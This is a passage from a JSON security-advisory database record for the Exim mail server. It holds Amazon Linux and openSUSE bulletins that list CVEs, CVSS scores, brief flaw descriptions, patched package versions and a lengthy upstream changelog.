[CVE-2020-28007](<https://access.redhat.com/security/cve/CVE-2020-28007>), [CVE-2020-28008](<https://access.redhat.com/security/cve/CVE-2020-28008>), [CVE-2020-28009](<https://access.redhat.com/security/cve/CVE-2020-28009>), [CVE-2020-28010](<https://access.redhat.com/security/cve/CVE-2020-28010>), [CVE-2020-28011](<https://access.redhat.com/security/cve/CVE-2020-28011>), [CVE-2020-28012](<https://access.redhat.com/security/cve/CVE-2020-28012>), [CVE-2020-28013](<https://access.redhat.com/security/cve/CVE-2020-28013>), [CVE-2020-28014](<https://access.redhat.com/security/cve/CVE-2020-28014>), [CVE-2020-28019](<https://access.redhat.com/security/cve/CVE-2020-28019>), [CVE-2020-28022](<https://access.redhat.com/security/cve/CVE-2020-28022>), [CVE-2020-28023](<https://access.redhat.com/security/cve/CVE-2020-28023>), [CVE-2020-28024](<https://access.redhat.com/security/cve/CVE-2020-28024>), [CVE-2020-28025](<https://access.redhat.com/security/cve/CVE-2020-28025>), [CVE-2020-28026](<https://access.redhat.com/security/cve/CVE-2020-28026>), [CVE-2021-27216](<https://access.redhat.com/security/cve/CVE-2021-27216>)\n\nMitre: [CVE-2020-28007](<https://vulners.com/cve/CVE-2020-28007>), [CVE-2020-28008](<https://vulners.com/cve/CVE-2020-28008>), [CVE-2020-28009](<https://vulners.com/cve/CVE-2020-28009>), [CVE-2020-28010](<https://vulners.com/cve/CVE-2020-28010>), [CVE-2020-28011](<https://vulners.com/cve/CVE-2020-28011>), [CVE-2020-28012](<https://vulners.com/cve/CVE-2020-28012>), [CVE-2020-28013](<https://vulners.com/cve/CVE-2020-28013>), [CVE-2020-28014](<https://vulners.com/cve/CVE-2020-28014>), [CVE-2020-28019](<https://vulners.com/cve/CVE-2020-28019>), [CVE-2020-28022](<https://vulners.com/cve/CVE-2020-28022>), [CVE-2020-28023](<https://vulners.com/cve/CVE-2020-28023>), [CVE-2020-28024](<https://vulners.com/cve/CVE-2020-28024>), [CVE-2020-28025](<https://vulners.com/cve/CVE-2020-28025>), [CVE-2020-28026](<https://vulners.com/cve/CVE-2020-28026>), [CVE-2021-27216](<https://vulners.com/cve/CVE-2021-27216>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T20:35:00", "type": "amazon", "title": "Critical: exim", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28019", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2022-08-04T22:42:00", "id": "ALAS-2022-1622", "href": "https://alas.aws.amazon.com/ALAS-2022-1622.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-24T06:30:54", "description": "**Issue Overview:**\n\nPrior versions of Exim 4 have Improper Neutralization of Line Delimiters. Local users can alter the behavior of root processes because a recipient address can have a newline character. (CVE-2020-28015)\n\nPrior versions of Exim 4 allowed Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail message with fifty million recipients. NOTE: remote exploitation may be difficult because of resource consumption. (CVE-2020-28017)\n\nPrior versions of Exim 4 allowed Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL. (CVE-2020-28018)\n\nPrior versions of Exim 4 have Improper Neutralization of Line Delimiters. An authenticated remote SMTP client can insert newline characters into a spool file (which indirectly leads to remote code execution as root) via AUTH= in a MAIL FROM command. (CVE-2020-28021)\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 exim-mysql-4.92-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mon-4.92-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-debuginfo-4.92-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-4.92-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-greylist-4.92-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-pgsql-4.92-1.27.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 exim-4.92-1.27.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 exim-4.92-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mon-4.92-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-greylist-4.92-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-pgsql-4.92-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mysql-4.92-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-debuginfo-4.92-1.27.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2020-28015](<https://access.redhat.com/security/cve/CVE-2020-28015>), [CVE-2020-28017](<https://access.redhat.com/security/cve/CVE-2020-28017>), [CVE-2020-28018](<https://access.redhat.com/security/cve/CVE-2020-28018>), [CVE-2020-28021](<https://access.redhat.com/security/cve/CVE-2020-28021>)\n\nMitre: [CVE-2020-28015](<https://vulners.com/cve/CVE-2020-28015>), [CVE-2020-28017](<https://vulners.com/cve/CVE-2020-28017>), [CVE-2020-28018](<https://vulners.com/cve/CVE-2020-28018>), [CVE-2020-28021](<https://vulners.com/cve/CVE-2020-28021>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T19:11:00", "type": "amazon", "title": "Important: exim", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28015", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28021"], "modified": "2021-05-07T20:34:00", "id": "ALAS-2021-1497", "href": "https://alas.aws.amazon.com/ALAS-2021-1497.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-13T14:47:47", "description": "**Issue Overview:**\n\nA flaw was found in Exim versions 4.87 to 4.91 before release 1.20 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution. (CVE-2019-10149)\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 exim-pgsql-4.91-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mysql-4.91-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-greylist-4.91-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-debuginfo-4.91-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mon-4.91-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-4.91-1.20.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 exim-4.91-1.20.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 exim-debuginfo-4.91-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-pgsql-4.91-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-4.91-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-greylist-4.91-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mon-4.91-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mysql-4.91-1.20.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2019-10149](<https://access.redhat.com/security/cve/CVE-2019-10149>)\n\nMitre: [CVE-2019-10149](<https://vulners.com/cve/CVE-2019-10149>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-05T17:12:00", "type": "amazon", "title": "Critical: exim", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-05T23:22:00", "id": "ALAS-2019-1221", "href": "https://alas.aws.amazon.com/ALAS-2019-1221.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2022-04-18T12:40:27", "description": "An update that fixes 26 vulnerabilities is now available.\n\nDescription:\n\n This update for exim fixes the following issues:\n\n\n Exim was updated to exim-4.94.2\n\n security update (boo#1185631)\n\n * CVE-2020-28007: Link attack in Exim's log directory\n * CVE-2020-28008: Assorted attacks in Exim's spool directory\n * CVE-2020-28014: Arbitrary PID file creation\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file (local)\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file (remote)\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\n update to exim-4.94.1\n\n * Fix security issue in BDAT state confusion. Ensure we reset known-good\n where we know we need to not be reading BDAT data, as a general case\n fix, and move the places where we switch to BDAT mode until after\n various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n * Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n * Fix security issue with too many recipients on a message (to remove a\n known security problem if someone does set recipients_max to unlimited,\n or if local additions add to the recipient list). Fixes CVE-2020-RCPTL\n reported by Qualys.\n * Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n * Fix security issue CVE-2020-PFPSN and guard against cmdline invoker\n providing a particularly obnoxious sender full name.\n * Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX\n better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n * Bug 1329: Fix format of Maildir-format filenames to match other mail-\n related applications. Previously an \"H\" was used where available info\n says that \"M\" should be, so change to match.\n * Bug 2587: Fix pam expansion condition. Tainted values are commonly\n used as arguments, so an implementation trying to copy these into a\n local buffer was taking a taint-enforcement trap. Fix by using\n dynamically created buffers.\n * Bug 2586: Fix listcount expansion operator. Using tainted arguments\n is reasonable, eg. to count headers. Fix by using dynamically created\n buffers rather than a local. Do similar fixes for ACL actions \"dcc\",\n \"log_reject_target\", \"malware\" and \"spam\"; the arguments are expanded\n so could be handling tainted values.\n * Bug 2590: Fix -bi (newaliases). A previous code rearrangement had\n broken the (no-op) support for this sendmail command. Restore it to\n doing nothing, silently, and returning good status.\n\n - update to exim 4.94\n * some transports now refuse to use tainted data in constructing their\n delivery location this WILL BREAK configurations which are not updated\n accordingly. In particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the Router to make it\n safe, should be updated to replace $local_user with $local_part_data.\n * Attempting to remove, in router or transport, a header name that ends\n with an asterisk (which is a standards-legal name) will now result in\n all headers named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee94)\n * fixes CVE-2020-12783 (boo#1171490)\n * Regard command-line recipients as tainted.\n * Bug 2489: Fix crash in the \"pam\" expansion condition.\n * Use tainted buffers for the transport smtp context.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities.\n * Fix the variables set by the gsasl authenticator.\n * Bug 2507: Modules: on handling a dynamic-module (lookups) open failure,\n only retrieve the errormessage once.\n * Bug 2501: Fix init call in the heimdal authenticator. Previously it\n adjusted the size of a major service buffer; this failed because the\n buffer was in use at the time. Change to a compile-time increase in\n the buffer size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n * Avoid costly startup code when not strictly needed. This reduces time\n for some exim process initialisations. It does mean that the logging\n of TLS configuration problems is only done for the daemon startup.\n * Early-pipelining support code is now included unless disabled in\n Makefile.\n * DKIM verification defaults no long accept sha1 hashes, to conform to\n RFC 8301. They can still be enabled, using the dkim_verify_hashes main\n option.\n * Support CHUNKING from an smtp transport using a transport_filter, when\n DKIM signing is being done. Previously a transport_filter would\n always disable CHUNKING, falling back to traditional DATA.\n * Regard command-line receipients as tainted.\n * Bug 340: Remove the daemon pid file on exit, whe due to SIGTERM.\n * Bug 2489: Fix crash in the \"pam\" expansion condition. It seems that\n the PAM library frees one of the arguments given to it, despite the\n documentation. Therefore a plain malloc must be used.\n * Bug 2491: Use tainted buffers for the transport smtp context.\n Previously\n on-stack buffers were used, resulting in a taint trap when DSN\n information copied from a received message was written into the\n buffer.\n * Bug 2493: Harden ARC verify against Outlook, whick has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file. Previously a naiive\n installation would get error messages from DMARC verify, when it hit\n the nonexistent file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option. Also enforce\n no DMARC verification for command-line sourced messages.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities. The introduction of\n taint tracking also did many adjustments to string handling. Since\n then, eximon frequently terminated with an assert failure.\n * When PIPELINING, synch after every hundred or so RCPT commands sent\n and check for 452 responses. This slightly helps the inefficieny of\n doing a large alias-expansion into a recipient-limited target. The\n max_rcpt transport option still applies (and at the current default,\n will override the new feature). The check is done for either cause of\n synch, and forces a fast-retry of all 452'd recipients using a new\n MAIL FROM on the same connection. The new facility is not tunable at\n this time.\n * Fix the variables set by the gsasl authenticator. Previously a\n pointer to library live data was being used, so the results became\n garbage. Make copies while it is still usable.\n * Logging: when the deliver_time selector ise set, include the DT= field\n on delivery deferred (==) and failed (**) lines (if a delivery was\n attemtped). Previously it was only on completion (=>) lines.\n * Authentication: the gsasl driver not provides the $authN variables in\n time for the expansion of the server_scram_iter and server_scram_salt\n options.\n\n spec file cleanup to make update work\n - add docdir to spec\n\n - update to exim 4.93\n * SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n * DISABLE_TLS replaces SUPPORT_TLS\n * Bump the version for the local_scan API.\n * smtp transport option hosts_try_fastopen defaults to \"*\".\n * DNSSec is requested (not required) for all queries. (This seemes to\n ask for trouble if your resolver is a systemd-resolved.)\n * Generic router option retry_use_local_part defaults to \"true\" under\n specific pre-conditions.\n * Introduce a tainting mechanism for values read from untrusted sources.\n * Use longer file names for temporary spool files (this avoids name\n conflicts with spool on a shared file system).\n * Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n * CVE-2019-16928: fix against Heap-based buffer overflow in\n string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n * CVE-2019-15846: fix against remote attackers executing arbitrary code\n as root via a trailing backslash\n\n - update to exim 4.92.1\n * CVE-2019-13917: Fixed an issue with ${sort} expansion which could allow\n remote attackers to execute other programs with root privileges\n (boo#1142207)\n\n - spec file cleanup\n * fix DANE inclusion guard condition\n * re-enable i18n and remove misleading comment\n * EXPERIMENTAL_SPF is now SUPPORT_SPF\n * DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n * ${l_header:<name>} expansion\n * ${readsocket} now supports TLS\n * \"utf8_downconvert\" option (if built with SUPPORT_I18N)\n * \"pipelining\" log_selector\n * JSON variants for ${extract } expansion\n * \"noutf8\" debug option\n * TCP Fast Open support on MacOS\n * CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n - add workaround patch for compile time error on missing printf format\n annotation (gnu_printf.patch)\n\n - update to 4.91\n * DEFER rather than ERROR on redis cluster MOVED response.\n * Catch and remove uninitialized value warning in exiqsumm\n * Disallow '/' characters in queue names specified for the \"queue=\" ACL\n modifier. This matches the restriction on the commandline.\n * Fix pgsql lookup for multiple result-tuples with a single column.\n Previously only the last row was returned.\n * Bug 2217: Tighten up the parsing of DKIM signature headers.\n * Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n * Fix issue with continued-connections when the DNS shifts unreliably.\n * Bug 2214: Fix SMTP responses resulting from non-accept result of MIME\n ACL.\n * The \"support for\" informational output now, which built with Content\n Scanning support, has a line for the malware scanner interfaces\n compiled in. Interface can be individually included or not at build\n time.\n * The \"aveserver\", \"kavdaemon\" and \"mksd\" interfaces are now not included\n by the template makefile \"src/EDITME\". The \"STREAM\" support for an\n older ClamAV interface method is removed.\n * Bug 2223: Fix mysql lookup returns for the no-data case (when the\n number of rows affected is given instead).\n * The runtime Berkeley DB library version is now additionally output by\n \"exim -d -bV\". Previously only the compile-time version was shown.\n * Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating\n SMTP connection.\n * Bug 2229: Fix cutthrough routing for nonstandard port numbers defined\n by routers.\n * Bug 2174: A timeout on connect for a callout was also erroneously seen\n as a timeout on read on a GnuTLS initiating connection, resulting in\n the initiating connection being dropped.\n * Relax results from ACL control request to enable cutthrough, in\n unsupported situations, from error to silently (except under debug)\n ignoring.\n * Fix Buffer overflow in base64d() (CVE-2018-6789)\n * Fix bug in DKIM verify: a buffer overflow could corrupt the malloc\n metadata, resulting in a crash in free().\n * Fix broken Heimdal GSSAPI authenticator integration.\n * Bug 2113: Fix conversation closedown with the Avast malware scanner.\n * Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail\n ACL.\n * Speed up macro lookups during configuration file read, by skipping non-\n macro text after a replacement (previously it was only once per line)\n and by skipping builtin macros when searching for an uppercase lead\n character.\n * DANE support moved from Experimental to mainline. The Makefile control\n for the build is renamed.\n * Fix memory leak during multi-message connections using STARTTLS.\n * Bug 2236: When a DKIM verification result is overridden by ACL, DMARC\n reported the original. Fix to report (as far as possible) the ACL\n result replacing the original.\n * Fix memory leak during multi-message connections using STARTTLS under\n OpenSSL\n * Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n * Fix utf8_downconvert propagation through a redirect router.\n * Bug 2253: For logging delivery lines under PRDR, append the overall\n DATA response info to the (existing) per-recipient response info for\n the \"C=\" log element.\n * Bug 2251: Fix ldap lookups that return a single attribute having zero-\n length value.\n * Support Avast multiline protocol, this allows passing flags to newer\n versions of the scanner.\n * Ensure that variables possibly set during message acceptance are\n marked dead before release of memory in the daemon loop.\n * Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such\n as a multi-recipient message from a mailinglist manager).\n * The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being\n replaced by the ${authresults } expansion.\n * Bug 2257: Fix pipe transport to not use a socket-only syscall.\n * Set a handler for SIGTERM and call exit(3) if running as PID 1. This\n allows proper process termination in container environments.\n * Bug 2258: Fix spool_wireformat in combination with LMTP transport.\n Previously the \"final dot\" had a newline after it; ensure it is CR,LF.\n * SPF: remove support for the \"spf\" ACL condition outcome values\n \"err_temp\" and \"err_perm\", deprecated since 4.83 when the RFC-defined\n words \" temperror\" and \"permerror\" were introduced.\n * Re-introduce enforcement of no cutthrough delivery on transports having\n transport-filters or DKIM-signing.\n * Cutthrough: for a final-dot response timeout (and nonunderstood\n responses) in defer=pass mode supply a 450 to the initiator.\n Previously the message would be spooled.\n * DANE: add dane_require_tls_ciphers SMTP Transport option; if unset,\n tls_require_ciphers is used as before.\n * Malware Avast: Better match the Avast multiline protocol.\n * Fix reinitialisation of DKIM logging variable between messages.\n * Bug 2255: Revert the disable of the OpenSSL session caching.\n * Add util/renew-opendmarc-tlds.sh script for safe renewal of public\n suffix list.\n * DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form,\n since the IETF WG has not yet settled on that versus the original\n \"bare\" representation.\n * Fix syslog logging for syslog_timestamp=no and log_selector +millisec.\n Previously the millisecond value corrupted the output. Fix also for\n syslog_pid=no and log_selector +pid, for which the pid corrupted the\n output.\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires.\n - update to 4.90.1\n * Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly\n during configuration. Wildcards are allowed and expanded.\n * Shorten the log line for daemon startup by collapsing adjacent sets of\n identical IP addresses on different listening ports. Will also affect\n \"exiwhat\" output.\n * Tighten up the checking in isip4 (et al): dotted-quad components\n larger than 255 are no longer allowed.\n * Default openssl_options to include +no_ticket, to reduce load on\n peers. Disable the session-cache too, which might reduce our load.\n Since we currrectly use a new context for every connection, both as\n server and client, there is no benefit for these.\n * Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at\n <https://reproducible-builds.org/specs/source-date-epoch/>.\n * Fix smtp transport use of limited max_rcpt under mua_wrapper.\n Previously the check for any unsuccessful recipients did not notice\n the limit, and erroneously found still-pending ones.\n * Pipeline CHUNKING command and data together, on kernels that support\n MSG_MORE. Only in-clear (not on TLS connections).\n * Avoid using a temporary file during transport using dkim. Unless a\n transport-filter is involved we can buffer the headers in memory for\n creating the signature, and read the spool data file once for the\n signature and again for transmission.\n * Enable use of sendfile in Linux builds as default. It was disabled in\n 4.77 as the kernel support then wasn't solid, having issues in 64bit\n mode. Now, it's been long enough. Add support for FreeBSD also.\n * Add commandline_checks_require_admin option.\n * Do pipelining under TLS.\n * For the \"sock\" variant of the malware scanner interface, accept an\n empty cmdline element to get the documented default one. Previously\n it was inaccessible.\n * Prevent repeated use of -p/-oMr\n * DKIM: enforce the DNS pubkey record \"h\" permitted-hashes optional\n field, if present.\n * DKIM: when a message has multiple signatures matching an identity\n given in dkim_verify_signers, run the dkim acl once for each.\n * Support IDNA2008.\n * The path option on a pipe transport is now expanded before use\n * Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n - Several bug fixes\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)\n\n This update was imported from the openSUSE:Leap:15.2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP2:\n\n zypper in -t patch openSUSE-2021-754=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-20T00:00:00", "type": "suse", "title": "Security update for exim (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2021-05-20T00:00:00", "id": "OPENSUSE-SU-2021:0754-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/3FZPX7R5ELKQM2EW7W2JYZ7EFIIDTT4E/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:40:27", "description": "An update that fixes 26 vulnerabilities is now available.\n\nDescription:\n\n This update for exim fixes the following issues:\n\n\n Exim was updated to exim-4.94.2\n\n security update (boo#1185631)\n\n * CVE-2020-28007: Link attack in Exim's log directory\n * CVE-2020-28008: Assorted attacks in Exim's spool directory\n * CVE-2020-28014: Arbitrary PID file creation\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file (local)\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file (remote)\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\n update to exim-4.94.1\n\n * Fix security issue in BDAT state confusion. Ensure we reset known-good\n where we know we need to not be reading BDAT data, as a general case\n fix, and move the places where we switch to BDAT mode until after\n various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n * Fix 